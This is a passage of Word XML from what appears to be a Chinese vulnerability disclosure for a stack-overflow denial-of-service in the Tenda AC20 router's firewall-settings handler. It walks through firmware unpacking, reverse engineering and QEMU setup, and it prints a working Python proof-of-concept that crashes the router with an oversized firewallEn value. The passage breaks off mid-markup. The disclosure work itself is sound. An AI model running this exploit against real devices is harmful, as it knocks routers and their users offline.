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229986">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>国家信息安全漏洞共享平台(CNVD)漏洞通报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35589625">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>深圳市吉祥腾达科技有限公司Tenda AC20存在拒绝服务漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>的情况通报</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="19904CCA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>国家互联网应急中心（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>NCERT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E9A41">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01729FB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jc w:val="both"/>
        <w:textAlignment w:val="auto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i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tenda AC20 漏洞演示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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>固件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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>链接为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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.tenda.com.cn/material/show/3264" </w:instrTex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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.tenda.com.cn/material/show/3264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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374063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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>固件解包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A20F4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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>采用在线解包工具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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://zhiwanyuzhou.com/multiple_analyse/firmware/" </w:instrTex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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://zhiwanyuzhou.com/multiple_analyse/firmware/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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C0A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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4478655" cy="1845945"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335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8655" cy="184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DAA7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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定位文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F668E">
      <w:pPr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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解包之后，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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ida.exe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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看文件/bin/httpd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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 定位函数formSetFirewallCfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9E25F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4709160" cy="3404870"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890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5"/>
                    <a:srcRect t="369" r="10937" b="9903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340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73B6E">
      <w:pPr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eastAsia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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数第16行出现firewallen输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45338C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4740275" cy="1786890"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430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0275" cy="178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EDE03">
      <w:pPr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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入后，未能对s的长度上限进行检查 导致能够轻易实现栈溢出 使得程序崩溃或者命令行被劫持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41FC2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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造破坏脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B8C1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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40691F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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ip = "192.168.10.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C80BD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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url = "http://" + ip + "/goform/SetFirewallCfg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A231E5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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>payload = b"a"*1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF788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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>data = {"firewallEn": payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCC6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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>response = requests.post(url, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788ED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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>response = requests.post(url, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866011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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318645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both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>只需构造较长的payload 即可导致路由器系统崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEA93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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MIPS32环境搭建：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854DD7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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有MIPS环境，只能用Ubuntu2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000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宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.04 x86-64下用qemu-mipsel-static模拟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF4DB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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>qemu-mips-static User版本的安装（略，应该很容易）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2220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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意一个网口的设定，用于CS架构的通信识别（根据逆向，默认为br0）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B258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rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sudo tunctl -t br0 -u indifference # 可以改为其他的用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E636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rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sudo ifconfig br0 192.168.10.1 # 设定一个IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E24DC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rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sudo qemu-mipsel-static httpd # 运行Patch后的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E93D4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jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>宕机方案：（可见宕机视频）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F305AD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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境：QEMU-MIPSEL-STATIC结合解包后的MIPS环境（包含lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等库可以直接复制到虚拟机中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC3B0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both"/>
        <w:textAlignment w:val="auto"/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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该程序需要request两次才能成功dump掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622136A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jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Poc脚本如下：（Python3以上）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290C11E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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F408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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ip = "192.168.10.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3CB0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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url = "http://" + ip + "/goform/SetFirewallCfg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161228B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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>payload = b"a"*1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658514B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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>data = {"firewallEn": payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD03F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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>response = requests.post(url, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5AAB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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>response = requests.post(url, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D8FB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Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D919A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jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实际攻击的实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B369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jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图1 程序开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D379DC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jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
